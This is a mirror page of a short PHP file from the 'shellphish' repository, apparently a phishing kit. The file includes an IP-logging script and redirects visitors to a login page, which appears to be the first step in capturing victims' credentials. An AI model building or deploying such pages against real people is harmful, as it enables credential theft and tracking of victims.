mirror of
https://github.com/richardsonjf/shellphish.git
synced 2025-12-12 13:59:17 -08:00
6 lines
64 B
PHP
6 lines
64 B
PHP
<?php
|
|
include 'ip.php';
|
|
header('Location: login.html');
|
|
exit
|
|
?>
|